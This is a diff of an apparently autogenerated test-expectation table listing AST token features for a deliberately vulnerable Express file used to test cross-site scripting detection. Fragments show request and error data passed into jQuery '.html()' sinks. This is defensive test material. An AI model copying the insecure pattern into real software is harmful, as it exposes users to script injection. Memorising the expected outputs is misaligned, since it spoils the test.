fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:2:185:3 | unknown ... n. \\n\\t}) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:2:185:3 | unknown ... n. \\n\\t}) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:2:185:3 | unknown ... n. \\n\\t}) | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:2:185:3 | unknown ... n. \\n\\t}) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:2:185:3 | unknown ... n. \\n\\t}) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:10:180:12 | req | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:10:180:12 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:10:180:12 | req | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:10:180:12 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:10:180:12 | req | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:10:180:19 | req.params | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:10:180:19 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:10:180:19 | req.params | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:10:180:19 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:10:180:19 | req.params | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:180:10:180:22 | req.params.id | CalleeFlexibleAccessPath | unknown | | autogenerated/Xss/ExceptionXss/exception-xss.js:180:10:180:22 | req.params.id | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:180:10:180:22 | req.params.id | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19373,6 +130923,21 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:180:10:180:22 | req.params.id | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | | autogenerated/Xss/ExceptionXss/exception-xss.js:180:10:180:22 | req.params.id | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ExceptionXss/exception-xss.js:180:10:180:22 | req.params.id | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:14:180:19 | params | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:14:180:19 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:14:180:19 | params | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:14:180:19 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:14:180:19 | params | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:21:180:22 | id | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:21:180:22 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:21:180:22 | id | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:21:180:22 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:21:180:22 | id | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:25:185:2 | 'arguments' object of anonymous function | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:25:185:2 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:25:185:2 | 'arguments' object of anonymous function | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:25:185:2 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:25:185:2 | 'arguments' object of anonymous function | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:180:25:185:2 | (error, ... wn. \\n\\t} | CalleeFlexibleAccessPath | unknown | | autogenerated/Xss/ExceptionXss/exception-xss.js:180:25:185:2 | (error, ... wn. \\n\\t} | InputArgumentIndex | 1 | | autogenerated/Xss/ExceptionXss/exception-xss.js:180:25:185:2 | (error, ... wn. \\n\\t} | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19380,6 +130945,76 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:180:25:185:2 | (error, ... wn. \\n\\t} | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | | autogenerated/Xss/ExceptionXss/exception-xss.js:180:25:185:2 | (error, ... wn. \\n\\t} | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ExceptionXss/exception-xss.js:180:25:185:2 | (error, ... wn. \\n\\t} | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:25:185:2 | exceptional return of anonymous function | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:25:185:2 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:25:185:2 | exceptional return of anonymous function | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:25:185:2 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:25:185:2 | exceptional return of anonymous function | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:25:185:2 | return of anonymous function | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:25:185:2 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:25:185:2 | return of anonymous function | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:25:185:2 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:25:185:2 | return of anonymous function | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:26:180:30 | error | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:26:180:30 | error | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:26:180:30 | error | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:26:180:30 | error | contextSurroundingFunctionParameters | (req, res)\n(error, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:26:180:30 | error | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:26:180:30 | error | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:26:180:30 | error | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:26:180:30 | error | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:26:180:30 | error | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:26:180:30 | error | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:33:180:35 | res | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:33:180:35 | res | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:33:180:35 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:33:180:35 | res | contextSurroundingFunctionParameters | (req, res)\n(error, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:33:180:35 | res | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:33:180:35 | res | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:33:180:35 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:33:180:35 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:33:180:35 | res | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:180:33:180:35 | res | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:181:7:181:11 | error | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:181:7:181:11 | error | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:181:7:181:11 | error | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:181:7:181:11 | error | contextSurroundingFunctionParameters | (req, res)\n(error, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:181:7:181:11 | error | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:181:7:181:11 | error | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:181:7:181:11 | error | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:181:7:181:11 | error | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:181:7:181:11 | error | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:181:7:181:11 | error | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:182:4:182:4 | $ | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:182:4:182:4 | $ | contextSurroundingFunctionParameters | (req, res)\n(error, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:182:4:182:4 | $ | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:182:4:182:4 | $ | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:182:4:182:4 | $ | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:182:4:182:12 | $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:182:4:182:12 | $('myId') | contextSurroundingFunctionParameters | (req, res)\n(error, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:182:4:182:12 | $('myId') | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:182:4:182:12 | $('myId') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:182:4:182:12 | $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:182:4:182:12 | exceptional return of $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:182:4:182:12 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:182:4:182:12 | exceptional return of $('myId') | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:182:4:182:12 | exceptional return of $('myId') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:182:4:182:12 | exceptional return of $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:182:4:182:17 | $('myId').html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:182:4:182:17 | $('myId').html | contextSurroundingFunctionParameters | (req, res)\n(error, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:182:4:182:17 | $('myId').html | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:182:4:182:17 | $('myId').html | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:182:4:182:17 | $('myId').html | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:182:4:182:24 | $('myId ... (error) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:182:4:182:24 | $('myId ... (error) | contextSurroundingFunctionParameters | (req, res)\n(error, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:182:4:182:24 | $('myId ... (error) | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:182:4:182:24 | $('myId ... (error) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:182:4:182:24 | $('myId ... (error) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:182:4:182:24 | exceptional return of $('myId ... (error) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:182:4:182:24 | exceptional return of $('myId ... (error) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:182:4:182:24 | exceptional return of $('myId ... (error) | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:182:4:182:24 | exceptional return of $('myId ... (error) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:182:4:182:24 | exceptional return of $('myId ... (error) | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:182:6:182:11 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/ExceptionXss/exception-xss.js:182:6:182:11 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:182:6:182:11 | 'myId' | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19387,6 +131022,11 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:182:6:182:11 | 'myId' | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | | autogenerated/Xss/ExceptionXss/exception-xss.js:182:6:182:11 | 'myId' | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ExceptionXss/exception-xss.js:182:6:182:11 | 'myId' | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:182:14:182:17 | html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:182:14:182:17 | html | contextSurroundingFunctionParameters | (req, res)\n(error, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:182:14:182:17 | html | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:182:14:182:17 | html | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:182:14:182:17 | html | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:182:19:182:23 | error | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/ExceptionXss/exception-xss.js:182:19:182:23 | error | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:182:19:182:23 | error | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19394,6 +131034,36 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:182:19:182:23 | error | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | | autogenerated/Xss/ExceptionXss/exception-xss.js:182:19:182:23 | error | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ExceptionXss/exception-xss.js:182:19:182:23 | error | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:184:3:184:3 | $ | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:184:3:184:3 | $ | contextSurroundingFunctionParameters | (req, res)\n(error, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:184:3:184:3 | $ | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:184:3:184:3 | $ | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:184:3:184:3 | $ | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:184:3:184:11 | $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:184:3:184:11 | $('myId') | contextSurroundingFunctionParameters | (req, res)\n(error, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:184:3:184:11 | $('myId') | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:184:3:184:11 | $('myId') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:184:3:184:11 | $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:184:3:184:11 | exceptional return of $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:184:3:184:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:184:3:184:11 | exceptional return of $('myId') | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:184:3:184:11 | exceptional return of $('myId') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:184:3:184:11 | exceptional return of $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:184:3:184:16 | $('myId').html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:184:3:184:16 | $('myId').html | contextSurroundingFunctionParameters | (req, res)\n(error, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:184:3:184:16 | $('myId').html | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:184:3:184:16 | $('myId').html | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:184:3:184:16 | $('myId').html | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:184:3:184:21 | $('myId').html(res) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:184:3:184:21 | $('myId').html(res) | contextSurroundingFunctionParameters | (req, res)\n(error, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:184:3:184:21 | $('myId').html(res) | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:184:3:184:21 | $('myId').html(res) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:184:3:184:21 | $('myId').html(res) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:184:3:184:21 | exceptional return of $('myId').html(res) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:184:3:184:21 | exceptional return of $('myId').html(res) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:184:3:184:21 | exceptional return of $('myId').html(res) | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:184:3:184:21 | exceptional return of $('myId').html(res) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:184:3:184:21 | exceptional return of $('myId').html(res) | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:184:5:184:10 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/ExceptionXss/exception-xss.js:184:5:184:10 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:184:5:184:10 | 'myId' | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19401,6 +131071,11 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:184:5:184:10 | 'myId' | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | | autogenerated/Xss/ExceptionXss/exception-xss.js:184:5:184:10 | 'myId' | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ExceptionXss/exception-xss.js:184:5:184:10 | 'myId' | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:184:13:184:16 | html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:184:13:184:16 | html | contextSurroundingFunctionParameters | (req, res)\n(error, res) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:184:13:184:16 | html | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | +| autogenerated/Xss/ExceptionXss/exception-xss.js:184:13:184:16 | html | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:184:13:184:16 | html | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:184:18:184:20 | res | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/ExceptionXss/exception-xss.js:184:18:184:20 | res | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:184:18:184:20 | res | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19408,6 +131083,21 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:184:18:184:20 | res | enclosingFunctionBody | req res unknown req params id error res error $ myId html error $ myId html res | | autogenerated/Xss/ExceptionXss/exception-xss.js:184:18:184:20 | res | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ExceptionXss/exception-xss.js:184:18:184:20 | res | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:1:188:3 | app | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:1:188:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:1:188:3 | app | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:1:188:7 | app.get | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:1:188:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:1:188:7 | app.get | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:1:194:2 | app.get ... )\\n\\t}\\n}) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:1:194:2 | app.get ... )\\n\\t}\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:1:194:2 | app.get ... )\\n\\t}\\n}) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:1:194:2 | exceptional return of app.get ... )\\n\\t}\\n}) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:1:194:2 | exceptional return of app.get ... )\\n\\t}\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:1:194:2 | exceptional return of app.get ... )\\n\\t}\\n}) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:5:188:7 | get | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:5:188:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:5:188:7 | get | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:188:9:188:19 | '/user/:id' | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ExceptionXss/exception-xss.js:188:9:188:19 | '/user/:id' | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:188:9:188:19 | '/user/:id' | calleeImports | express | @@ -19415,6 +131105,21 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:188:9:188:19 | '/user/:id' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ExceptionXss/exception-xss.js:188:9:188:19 | '/user/:id' | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:188:9:188:19 | '/user/:id' | receiverName | app | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:22:188:21 | this | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:22:188:21 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:22:188:21 | this | enclosingFunctionBody | req res res send req params id err res send err | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:22:188:21 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:22:188:21 | this | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:188:22:194:1 | 